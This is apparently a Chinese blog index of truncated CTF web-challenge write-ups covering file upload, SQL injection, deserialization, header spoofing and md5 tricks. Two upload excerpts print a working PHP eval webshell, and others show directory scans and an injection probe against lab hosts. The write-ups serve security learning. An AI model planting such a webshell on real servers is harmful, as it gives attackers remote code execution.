[SWPUCTF 2021 新生赛]easyupload2.0 上传木马: 1 <?php @eval($_POST['Lyrio']);phpinfo();?> // phpinfo() 在这里充当标记的作用 提示过滤了 php 文件 过滤代码在后端,只能黑盒测试 最后发现使用 php 的等
[SWPUCTF 2021 新生赛]easyupload1.0 丢个木马上去 1 <?php @eval($_POST['Lyrio']);phpinfo();?> // phpinfo() 在这里充当标记的作用 看样子是被过滤了,查看页面源码,过滤代码不在前端而在后端 后端
[SWPUCTF 2021 新生赛]ez_unserialize 扫描目录 python dirsearch.py -u "http://node5.anna.nssctf.cn:28789/" -e * 访问 robots.txt 访问 cl45s.php 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34
[第五空间 2021]WebFTP 用Dirsearch目录扫描python dirsearch.py -u "http://node4.anna.nssctf.cn:28680/" -e * 访问phpinfo.php,CTRL+F查询"flag" 这
[SWPUCTF 2021 新生赛]Do_you_know_http提示"请使用 WLLM 浏览器" 利用BurpSuite抓包伪造User-Agent:W
[SWPUCTF 2021 新生赛]easy_sql 一道简单不过的联合注入题,水一下文章数 查看页面源码,得到参数名 尝试用GET给wllm参数传个1 ?wllm=1'页
[SWPUCTF 2021 新生赛]easy_md5 完整的代码注释放在文末 来看关键代码块 1 2 3 if ($name != $password && md5($name) == md5($password)){ echo $flag; } 要满足两个字符串不相等、但经过 md5 加密后的结果是相